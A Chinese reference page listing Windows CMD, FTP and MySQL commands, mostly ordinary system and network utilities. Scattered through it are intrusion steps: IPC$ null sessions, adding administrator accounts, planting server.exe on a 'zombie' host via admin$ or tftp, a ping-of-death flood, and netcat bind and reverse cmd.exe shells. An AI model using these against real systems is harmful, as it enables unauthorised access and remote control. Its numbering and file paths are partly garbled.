<h1><strong>命令大全</strong></h1>

<p>cmd是command的缩写.即命令行 。</p>

<p>虽然随着计算机产业的发展，Windows 操作系统的应用越来越广泛，DOS 面临着被淘汰的命运，但是因为它运行安全、稳定，有的用户还在使用，所以一般Windows 的各种版本都与其兼容，用户可以在Windows 系统下运行DOS，中文版Windows XP 中的命令提示符进一步提高了与DOS 下操作命令的兼容性，用户可以在命令提示符直接输入中文调用文件。</p>

<p>　　在9x系统下输入command就可以打开命令行.而在NT系统上可以输入cmd来打开，在windows2003后被cmd替代，利用CMD命令查询系统的信息或者是判断网络的好坏。下图为CMD启动后的界面。</p>

<h2>常见操作</h2>

<h3>解决端口占用</h3>

<p>netstat -ano，列出所有端口的情况。在列表中我们观察被占用的端口，比如是49157，首先找到它。</p>

<p>netstat -aon|findstr &quot;49157&quot;，回车，记下最后一位数字，即PID,这里是2720&nbsp;查看被占用端口对应的PID</p>

<p>tasklist|findstr &quot;2720&quot;，回车，查看是哪个进程或者程序占用了2720端口，结果是：svchost.exe</p>

<p>在任务管理器中选中该进程点击&rdquo;结束进程&ldquo;按钮，或者是在cmd的命令窗口中输入：taskkill /f /t /im Tencentdl.exe。</p>

<p>&nbsp;</p>

<h2><strong>运行操作</strong></h2>

<p>CMD命令：开始－&gt;运行－&gt;键入cmd或command(在命令行里可以看到系统版本、文件系统版本)</p>

<p>CMD命令锦集</p>

<p>&nbsp; &nbsp; &nbsp; 1. gpedit.msc-----组策略</p>

<p>　　2. sndrec32-------录音机</p>

<p>　　3. Nslookup-------IP地址侦测器 ，是一个 监测网络中 DNS 服务器是否能正确实现域名解析的命令行工具。 它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中却没有集成这一个工具。</p>

<p>　　4. explorer-------打开资源管理器</p>

<p>　　5. logoff---------注销命令</p>

<p>　　6. shutdown-------60秒倒计时关机命令</p>

<p>　　7. lusrmgr.msc----本机用户和组</p>

<p>　　8. services.msc---本地服务设置</p>

<p>　　9. oobe/msoobe /a----检查XP是否激活</p>

<p>　　10. notepad--------打开记事本</p>

<p>　　11. cleanmgr-------垃圾整理</p>

<p>　　12. net start messenger----开始信使服务</p>

<p>　　13. compmgmt.msc---计算机管理</p>

<p>　　14. net stop messenger-----停止信使服务</p>

<p>　　15. conf-----------启动netmeeting</p>

<p>　　16. dvdplay--------DVD播放器</p>

<p>　　17. charmap--------启动字符映射表</p>

<p>　　18. diskmgmt.msc---磁盘管理实用程序</p>

<p>　　19. calc-----------启动计算器</p>

<p>　　20. dfrg.msc-------磁盘碎片整理程序</p>

<p>　　21. chkdsk.exe-----Chkdsk磁盘检查</p>

<p>　　22. devmgmt.msc--- 设备管理器</p>

<p>　　23. regsvr32 /u *.dll----停止dll文件运行</p>

<p>　　24. drwtsn32------ 系统医生</p>

<p>　　25. rononce -p----15秒关机</p>

<p>　　26. dxdiag---------检查DirectX信息</p>

<p>　　27. regedt32-------注册表编辑器</p>

<p>　　28. Msconfig.exe---系统配置实用程序</p>

<p>　　29. rsop.msc-------组策略结果集</p>

<p>　　30. mem.exe--------显示内存使用情况</p>

<p>　　31. regedit.exe----注册表</p>

<p>　　32. winchat--------XP自带局域网聊天</p>

<p>　　33. progman--------程序管理器</p>

<p>　　34. winmsd---------系统信息</p>

<p>　　35. perfmon.msc----计算机性能监测程序</p>

<p>　　36. winver---------检查Windows版本</p>

<p>　　37. sfc /scannow-----扫描错误并复原</p>

<p>　　38. taskmgr-----任务管理器（2000/xp/2003</p>

<p>　　40. wmimgmt.msc----打开windows管理体系结构(WMI)</p>

<p>　　41. wupdmgr--------windows更新程序</p>

<p>　　42. wscript--------windows脚本宿主设置</p>

<p>　　43. write----------写字板</p>

<p>　　45. wiaacmgr-------扫描仪和照相机向导</p>

<p>　　46. winchat--------XP自带局域网聊天</p>

<p>　　49. mplayer2-------简易widnows media player</p>

<p>　　50. mspaint--------画图板</p>

<p>　　51. mstsc----------远程桌面连接</p>

<p>　　53. magnify--------放大镜实用程序</p>

<p>　　54. mmc------------打开控制台</p>

<p>　　55. mobsync--------同步命令</p>

<p>　　57. iexpress-------木马捆绑工具，系统自带</p>

<p>　　58. fsmgmt.msc-----共享文件夹管理器</p>

<p>　　59. utilman--------辅助工具管理器</p>

<p>　　61. dcomcnfg-------打开系统组件服务</p>

<p>　　62. ddeshare-------打开DDE共享设置</p>

<p>　　110. osk------------打开屏幕键盘</p>

<p>　　111. odbcad32-------ODBC数据源管理器</p>

<p>　　112. oobe/msoobe /a----检查XP是否激活</p>

<p>　　68. ntbackup-------系统备份和还原</p>

<p>　　69. narrator-------屏幕&ldquo;讲述人&rdquo;</p>

<p>　　70. ntmsmgr.msc----移动存储管理器</p>

<p>　　71. ntmsoprq.msc---移动存储管理员操作请求</p>

<p>　　72. netstat -an----(TC)命令检查接口</p>

<p>　　73. syncapp--------创建一个公文包</p>

<p>　　74. sysedit--------系统配置编辑器</p>

<p>　　75. sigverif-------文件签名验证程序</p>

<p>　　76. ciadv.msc------索引服务程序</p>

<p>　　77. shrpubw--------创建共享文件夹</p>

<p>　　78. secpol.msc-----本地安全策略</p>

<p>　　79. syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码</p>

<p>　　80. services.msc---本地服务设置</p>

<p>　　81. Sndvol32-------音量控制程序</p>

<p>　　82. sfc.exe--------系统文件检查器</p>

<p>　　83. sfc /scannow---windows文件保护</p>

<p>　　84. ciadv.msc------索引服务程序</p>

<p>　　85. tourstart------xp简介（安装完成后出现的漫游xp程序）</p>

<p>　　86. taskmgr--------任务管理器</p>

<p>　　87. eventvwr-------事件查看器</p>

<p>　　88. eudcedit-------造字程序</p>

<p>　　89. compmgmt.msc---计算机管理</p>

<p>　　90. packager-------对象包装程序</p>

<p>　　91. perfmon.msc----计算机性能监测程序</p>

<p>　　92. charmap--------启动字符映射表</p>

<p>　　93. cliconfg-------SQL SERVER 客户端网络实用程序</p>

<p>　　94. Clipbrd--------剪贴板查看器</p>

<p>　　95. conf-----------启动netmeeting</p>

<p>　　96. certmgr.msc----证书管理实用程序</p>

<p>　　97. regsvr32 /u *.dll----停止dll文件运行</p>

<p>　　98. regsvr32 /u zipfldr.dll------取消ZIP支持</p>

<p>　　99. cmd.exe--------CMD命令提示符</p>

<h2><strong>操作详解　</strong>　</h2>

<p>&nbsp; &nbsp; &nbsp; net use ipipc$ &quot; &quot; /user:&quot; &quot; 建立IPC空链接</p>

<p>　　net use ipipc$ &quot;密码&quot; /user:&quot;用户名&quot; 建立IPC非空链接</p>

<p>　　net use h: ipc$ &quot;密码&quot; /user:&quot;用户名&quot; 直接登陆后映射对方C：到本地为H:</p>

<p>　　net use h: ipc$ 登陆后映射对方C：到本地为H:</p>

<p>　　net use ipipc$ /del 删除IPC链接</p>

<p>　　net use h: /del 删除映射对方到本地的为H:的映射</p>

<p>　　net user 用户名　密码　/add 建立用户</p>

<p>　　net user guest /active:yes 激活guest用户</p>

<p>　　net user 查看有哪些用户</p>

<p>　　net user 帐户名 查看帐户的属性</p>

<p>　　net localgroup administrators 用户名 /add 把&ldquo;用户&rdquo;添加到管理员中使其具有管理员权限</p>

<p>　　net start 查看开启了哪些服务</p>

<p>　　net start 服务名　开启服务；(如:net start telnet， net start schedule)</p>

<p>　　net stop 服务名 停止某服务</p>

<p>　　net time 目标ip 查看对方时间</p>

<p>　　net time 目标ip /set 设置本地计算机时间与&ldquo;目标IP&rdquo;主机的时间同步,加上参数/yes可取消确认信息</p>

<p>　　net view 查看本地局域网内开启了哪些共享</p>

<p>　　net view ip 查看对方局域网内开启了哪些共享</p>

<p>　　net config 显示系统网络设置</p>

<p>　　net logoff 断开连接的共享</p>

<p>　　net pause 服务名 暂停某服务</p>

<p>　　net send ip &quot;文本信息&quot; 向对方发信息</p>

<p>　　net ver 局域网内正在使用的网络连接类型和信息</p>

<p>　　net share 查看本地开启的共享</p>

<p>　　net share ipc$ 开启ipc$共享</p>

<p>　　net share ipc$ /del 删除ipc$共享</p>

<p>　　net share c$ /del 删除C：共享</p>

<p>　　net user guest 12345 用guest用户登陆后用将密码改为12345</p>

<p>　　net password 密码 更改系统登陆密码</p>

<p>　　netstat -a 查看开启了哪些端口,常用netstat -an</p>

<p>　　netstat -n 查看端口的网络连接情况，常用netstat -an</p>

<p>　　netstat -v 查看正在进行的工作</p>

<p>　　netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况</p>

<p>　　netstat -s 查看正在使用的所有协议使用情况</p>

<p>　　nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名</p>

<p>　　tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：&ldquo;-w数字&rdquo;用于设置超时间隔。</p>

<p>　　ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：&ldquo;-l[空格]数据包大小&rdquo;；&ldquo;-n发送数据次数&rdquo;；&ldquo;-t&rdquo;指一直ping。</p>

<p>　　ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)</p>

<p>　　ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数&ldquo;/all&rdquo;显示全部配置信息</p>

<p>　　tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)</p>

<p>　　kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)</p>

<p>　　del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如&ldquo;DEL/AR *.*&rdquo;表示删除当前目录下所有只读文件，&ldquo;DEL/A-S *.*&rdquo;表示删除当前目录下除系统文件以外的所有文件</p>

<p>　　del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）</p>

<p>　　move 盘符路径要移动的文件名　存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖</p>

<p>　　fc one.txt two.txt &gt; 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，&quot;&gt; &quot;和&quot;&gt; &gt;&quot; 是重定向命令</p>

<p>　　at id号 开启已注册的某个计划任务</p>

<p>　　at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止</p>

<p>　　at id号 /delete 停止某个已注册的计划任务</p>

<p>　　at 查看所有的计划任务</p>

<p>　　at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机</p>

<p>　　finger username @host 查看最近有哪些用户登陆</p>

<p>　　telnet ip 端口 远和登陆服务器,默认端口为23</p>

<p>　　open ip 连接到IP（属telnet登陆后的命令）</p>

<p>　　telnet 在本机上直接键入telnet 将进入本机的telnet</p>

<p>　　copy 路径文件名1　路径文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件</p>

<p>　　copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下</p>

<p>　　copy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件</p>

<p>　　copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：</p>

<p>　　xcopy 要复制的文件或目录树　目标地址目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件</p>

<p>　　用参数/e才可连目录下的子目录一起复制到目标地址下。</p>

<p>　　tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后，将&ldquo;IP&rdquo;的server.exe下载到目标主机c:server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送</p>

<p>　　tftp -i 对方IP　put c:server.exe 登陆后，上传本地c:server.exe至主机</p>

<p>　　ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)</p>

<p>　　route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface</p>

<p>　　arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息</p>

<p>　　start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令</p>

<p>　　mem 查看cpu使用情况</p>

<p>　　attrib 文件名(目录名) 查看某文件（目录）的属性</p>

<p>　　attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用+则是添加为某属性</p>

<p>　　dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间</p>

<p>　　date /t 、 time /t 使用此参数即&ldquo;DATE/T&rdquo;、&ldquo;TIME/T&rdquo;将只显示当前日期和时间，而不必输入新日期和时间</p>

<p>　　set 指定环境变量名称=要指派给变量的字符 设置环境变量</p>

<p>　　set 显示当前所有的环境变量</p>

<p>　　set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量</p>

<p>　　pause 暂停批处理程序，并显示出：请按任意键继续....</p>

<p>　　if 在批处理程序中执行条件处理（更多说明见if命令及变量）</p>

<p>　　goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：&ldquo;：start&rdquo;标签）</p>

<p>　　call 路径批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）</p>

<p>　　for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）</p>

<p>　　echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置</p>

<p>　　echo 信息 在屏幕上显示出信息</p>

<p>　　echo 信息 &gt;&gt; pass.txt 将&quot;信息&quot;保存到pass.txt文件中</p>

<p>　　findstr &quot;Hello&quot; aa.txt 在aa.txt文件中寻找字符串hello</p>

<p>　　find 文件名 查找某文件</p>

<p>　　title 标题名字 更改CMD窗口标题名字</p>

<p>　　color 颜色值 设置cmd控制台前景和背景颜色；0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白</p>

<p>　　prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为：EntSky )</p>

<p>　　ver 在DOS窗口下显示版本信息</p>

<p>　　winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）</p>

<p>　　format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS</p>

<p>　　md　目录名 创建目录</p>

<p>　　replace 源文件　要替换文件的目录 替换文件</p>

<p>　　ren 原文件名　新文件名 重命名文件名</p>

<p>　　tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称</p>

<p>　　type 文件名 显示文本文件的内容</p>

<p>　　more 文件名 逐屏显示输出文件</p>

<p>　　doskey 要锁定的命令=字符</p>

<p>　　doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=</p>

<p>　　taskmgr 调出任务管理器</p>

<p>　　chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误</p>

<p>　　tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口</p>

<p>　　exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe</p>

<p>　　path 路径可执行文件的文件名 为可执行文件设置一个路径。</p>

<p>　　cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?</p>

<p>　　regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；</p>

<p>　　regedit /e 注册表文件名 导出注册表</p>

<p>　　cacls 文件名　参数 显示或修改文件访问控制列表（ACL）&mdash;&mdash;针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。</p>

<p>　　cacls 文件名 查看文件的访问用户权限列表</p>

<p>　　REM 文本内容 在批处理文件中添加注解</p>

<p>　　netsh 查看或更改本地网络配置情况</p>

<p>　　IIS服务命令</p>

<p>　　iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）</p>

<p>　　iisreset /start或stop 启动（停止）所有Internet服务</p>

<p>　　iisreset /restart 停止然后重新启动所有Internet服务</p>

<p>　　iisreset /status 显示所有Internet服务状态</p>

<p>　　iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动</p>

<p>　　iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机</p>

<p>　　iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务</p>

<p>　　iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。</p>

<h2><strong>FTP 命令： (后面有详细说明内容)</strong></h2>

<p>　　ftp的命令行格式为:</p>

<p>　　ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。</p>

<p>　　－d 使用调试方式。</p>

<p>　　－n 限制ftp的自动登录,即不使用.netrc文件。</p>

<p>　　－g 取消全局文件名。</p>

<p>　　help [命令] 或 ？[命令] 查看命令说明</p>

<p>　　bye 或 quit 终止主机FTP进程,并退出FTP管理方式.</p>

<p>　　pwd 列出当前远端主机目录</p>

<p>　　put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中</p>

<p>　　get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中</p>

<p>　　mget [remote-files] 从远端主机接收一批文件至本地主机</p>

<p>　　mput local-files 将本地主机中一批文件传送至远端主机</p>

<p>　　dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件</p>

<p>　　ascii 设定以ASCII方式传送文件(缺省值)</p>

<p>　　bin 或 image 设定以二进制方式传送文件</p>

<p>　　bell 每完成一次文件传送,报警提示</p>

<p>　　cdup 返回上一级目录</p>

<p>　　close 中断与远程服务器的ftp会话(与open对应)</p>

<p>　　open host[port] 建立指定ftp服务器连接,可指定连接端口</p>

<p>　　delete 删除远端主机中的文件</p>

<p>　　mdelete [remote-files] 删除一批文件</p>

<p>　　mkdir directory-name 在远端主机中建立目录</p>

<p>　　rename [from] [to] 改变远端主机中的文件名</p>

<p>　　rmdir directory-name 删除远端主机中的目录</p>

<p>　　status 显示当前FTP的状态</p>

<p>　　system 显示远端主机系统类型</p>

<p>　　user user-name [password] [account] 重新以别的用户名登录远端主机</p>

<p>　　open host [port] 重新建立一个新的连接</p>

<p>　　prompt 交互提示模式</p>

<p>　　macdef 定义宏命令</p>

<p>　　lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录</p>

<p>　　chmod 改变远端主机的文件权限</p>

<p>　　case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母</p>

<p>　　cd remote－dir 进入远程主机目录</p>

<p>　　cdup 进入远程主机目录的父目录</p>

<p>　　! 在本地机中执行交互shell，exit回到ftp环境,如!ls*.zip</p>

<h2><strong>FTP命令详解</strong></h2>

<p>　　FTP命令是Internet用户使用最频繁的命令之一，熟悉并灵活应用FTP的内部命令，可以大大方便使用者，并收到事半功倍之效。如果你想学习使用进行后台FTP下载，那么就必须学习FTP指令。</p>

<p>　　FTP的命令行格式为：</p>

<p>　　ftp -v -d -i -n -g [主机名] ，其中</p>

<p>　　-v 显示远程服务器的所有响应信息</p>

<p>　　-n 限制ftp的自动登录，即不使用；.n etrc文件；</p>

<p>　　-d 使用调试方式；</p>

<p>　　-g 取消全局文件名。</p>

<p>　　FTP使用的内部命令如下(中括号表示可选项):</p>

<p>　　1.![cmd[args]]：在本地机中执行交互shell，exit回到ftp环境，如：!ls*.zip</p>

<p>　　2.$ macro-ame[args]： 执行宏定义macro-name。</p>

<p>　　3.account[password]： 提供登录远程系统成功后访问系统资源所需的补充口令。</p>

<p>　　4.append local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。</p>

<p>　　5.ascii：使用ascii类型传输方式。</p>

<p>　　6.bell：每个命令执行完毕后计算机响铃一次。</p>

<p>　　7.bin：使用二进制文件传输方式。</p>

<p>　　8.bye：退出ftp会话过程。</p>

<p>　　9.case：在使用mget时，将远程主机文件名中的大写转为小写字母。</p>

<p>　　10. cd remote-dir：进入远程主机目录。</p>

<p>　　11.cdup：进入远程主机目录的父目录。</p>

<p>　　12.chmod mode file-name：将远程主机文件file-name的存取方式设置为mode，如：chmod 777 a.out。</p>

<p>　　13.close：中断与远程服务器的ftp会话(与open对应)。</p>

<p>　　14 .cr：使用asscii方式传输文件时，将回车换行转换为回行。</p>

<p>　　15.delete remote-file：删除远程主机文件。</p>

<p>　　16.debug[debug-value]：设置调试方式， 显示发送至远程主机的每条命令，如：deb up 3，若设为0，表示取消debug。</p>

<p>　　17.dir[remote-dir][local-file]：显示远程主机目录，并将结果存入本地文件。</p>

<p>　　18.disconnection：同close。</p>

<p>　　19.form format：将文件传输方式设置为format，缺省为file方式。</p>

<p>　　20.get remote-file[local-file]： 将远程主机的文件remote-file传至本地硬盘的local-file。</p>

<p>　　21.glob：设置mdelete，mget，mput的文件名扩展，缺省时不扩展文件名，同命令行的-g参数。</p>

<p>　　22.hash：每传输1024字节，显示一个hash符号(#)。</p>

<p>　　23.help[cmd]：显示ftp内部命令cmd的帮助信息，如：help get。</p>

<p>　　24.idle[seconds]：将远程服务器的休眠计时器设为[seconds]秒。</p>

<p>　　25.image：设置二进制传输方式(同binary)。</p>

<p>　　26.lcd[dir]：将本地工作目录切换至dir。</p>

<p>　　27. ls[remote-dir][local-file]：显示远程目录remote-dir， 并存入本地文件local-file。</p>

<p>　　28.macdef macro-name：定义一个宏，遇到macdef下的空行时，宏定义结束。</p>

<p>　　29.mdelete[remote-file]：删除远程主机文件。</p>

<p>　　30.mdir remote-files local-file：与dir类似，但可指定多个远程文件，如 ：mdir *.o.*.zipoutfile 。</p>

<p>　　31.mget remote-files：传输多个远程文件。</p>

<p>　　32.mkdir dir-name：在远程主机中建一目录。</p>

<p>　　33.mls remote-file local-file：同nlist，但可指定多个文件名。</p>

<p>　　34.mode[modename]：将文件传输方式设置为modename， 缺省为stream方式。</p>

<p>　　35.modtime file-name：显示远程主机文件的最后修改时间。</p>

<p>　　36.mput local-file：将多个文件传输至远程主机。</p>

<p>　　37.newer file-name： 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近，则重传该文件。</p>

<p>　　38.nlist[remote-dir][local-file]：显示远程主机目录的文件清单，并存入本地硬盘的local-file。</p>

<p>　　39.nmap[inpattern outpattern]：设置文件名映射机制， 使得文件传输时，文件中的某些字符相互转换， 如：nmap $1.$2.$3[$1，$2].[$2，$3]，则传输文件a1.a2.a3时，文件名变为a1，a2。 该命令特别适用于远程主机为非UNIX机的情况。</p>

<p>　　40.ntrans[inchars[outchars]]：设置文件名字符的翻译机制，如ntrans1R，则文件名LLL将变为RRR。</p>

<p>　　41.open host[port]：建立指定ftp服务器连接，可指定连接端口。</p>

<p>　　42.passive：进入被动传输方式。</p>

<p>　　43.prompt：设置多个文件传输时的交互提示。</p>

<p>　　44.proxy ftp-cmd：在次要控制连接中，执行一条ftp命令， 该命令允许连接两个ftp服务器，以在两个服务器间传输文件。第一条ftp命令必须为open，以首先建立两个服务器间的连接。</p>

<p>　　45.put local-file[remote-file]：将本地文件local-file传送至远程主机。</p>

<p>　　46.pwd：显示远程主机的当前工作目录。</p>

<p>　　47.quit：同bye，退出ftp会话。</p>

<p>　　48.quote arg1，arg2...：将参数逐字发至远程ftp服务器，如：quote syst.</p>

<p>　　49.recv remote-file[local-file]：同get。</p>

<p>　　50.reget remote-file[local-file]：类似于get， 但若local-file存在，则从上次传输中断处续传。</p>

<p>　　51.rhelp[cmd-name]：请求获得远程主机的帮助。</p>

<p>　　52.rstatus[file-name]：若未指定文件名，则显示远程主机的状态， 否则显示文件状态。</p>

<p>　　53.rename[from][to]：更改远程主机文件名。</p>

<p>　　54.reset：清除回答队列。</p>

<p>　　55.restart marker：从指定的标志marker处，重新开始get或put，如：restart 130。</p>

<p>　　56.rmdir dir-name：删除远程主机目录。</p>

<p>　　57.runique：设置文件名只一性存储，若文件存在，则在原文件后加后缀.1， .2等。</p>

<p>　　58.send local-file[remote-file]：同put。</p>

<p>　　59.sendport：设置PORT命令的使用。</p>

<p>　　60.site arg1，arg2...：将参数作为SITE命令逐字发送至远程ftp主机。</p>

<p>　　61.size file-name：显示远程主机文件大小，如：site idle 7200。</p>

<p>　　62.status：显示当前ftp状态。</p>

<p>　　63.struct[struct-name]：将文件传输结构设置为struct-name， 缺省时使用stream结构。</p>

<p>　　64.sunique：将远程主机文件名存储设置为只一(与runique对应)。</p>

<p>　　65.system：显示远程主机的操作系统类型。</p>

<p>　　66.tenex：将文件传输类型设置为TENEX机的所需的类型。</p>

<p>　　67.tick：设置传输时的字节计数器。</p>

<p>　　68.trace：设置包跟踪。</p>

<p>　　69.type[type-name]：设置文件传输类型为type-name，缺省为ascii，如:type binary，设置二进制传输方式。</p>

<p>　　70.umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask 3</p>

<p>　　71.user user-name[password][account]：向远程主机表明自己的身份，需要口令时，必须输入口令，如：user anonymous my@email。</p>

<p>　　72.verbose：同命令行的-v参数，即设置详尽报告方式，ftp 服务器的所有响 应都将显示给用户，缺省为on.</p>

<p>　　73.?[cmd]：同help.</p>

<h2><strong>MYSQL 命令</strong></h2>

<p>　　mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。</p>

<p>　　（例：mysql -h110.110.110.110 -Uroot -P123456</p>

<p>　　注:u与root可以不用加空格，其它也一样）</p>

<p>　　exit 退出MYSQL</p>

<p>　　mysqladmin -u用户名 -p旧密码 password 新密码 修改密码</p>

<p>　　grant select on 数据库.* to 用户名@登录主机 identified by &quot;密码&quot;; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）</p>

<p>　　show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。</p>

<p>　　use mysql；</p>

<p>　　show tables; 显示库中的数据表</p>

<p>　　describe 表名; 显示数据表的结构</p>

<p>　　create database 库名; 建库</p>

<p>　　use 库名；</p>

<p>　　create table 表名 (字段设定列表)； 建表</p>

<p>　　drop database 库名;</p>

<p>　　drop table 表名； 删库和删表</p>

<p>　　delete from 表名; 将表中记录清空</p>

<p>　　select * from 表名; 显示表中的记录</p>

<p>　　mysqldump --opt school&gt;school.bbb 备份数据库：（命令在DOS的mysqlin目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。</p>

<p>　　win2003系统下新增命令（实用部份）：</p>

<p>　　shutdown /参数 关闭或重启本地或远程主机。</p>

<p>　　参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。</p>

<p>　　例：shutdown /r /t 0 立即重启本地主机（无延时）</p>

<p>　　taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。</p>

<p>　　参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。</p>

<p>　　tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。</p>

<p>　　参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程。</p>

<h2><strong>系统外部命令</strong></h2>

<p>　　注：系统外部命令(均需下载相关工具)</p>

<h3>瑞士军刀：nc.exe</h3>

<p>　　参数说明：</p>

<p>　　-h 查看帮助信息</p>

<p>　　-d 后台模式</p>

<p>　　-e prog程序重定向，一但连接就执行[危险]</p>

<p>　　-i secs延时的间隔</p>

<p>　　-l 监听模式，用于入站连接</p>

<p>　　-L 监听模式，连接天闭后仍然继续监听，直到CTR+C</p>

<p>　　-n IP地址，不能用域名</p>

<p>　　-o film记录16进制的传输</p>

<p>　　-p[空格]端口 本地端口号</p>

<p>　　-r 随机本地及远程端口</p>

<p>　　-t 使用Telnet交互方式</p>

<p>　　-u UDP模式</p>

<p>　　-v 详细输出，用-vv将更详细</p>

<p>　　-w数字 timeout延时间隔</p>

<p>　　-z 将输入，输出关掉（用于扫锚时）</p>

<p>　　基本用法：</p>

<p>　　nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口</p>

<p>　　nc -l -p 80 开启本机的TCP 80端口并监听</p>

<p>　　nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口</p>

<p>　　nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口</p>

<p>　　nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口</p>

<p>　　高级用法：</p>

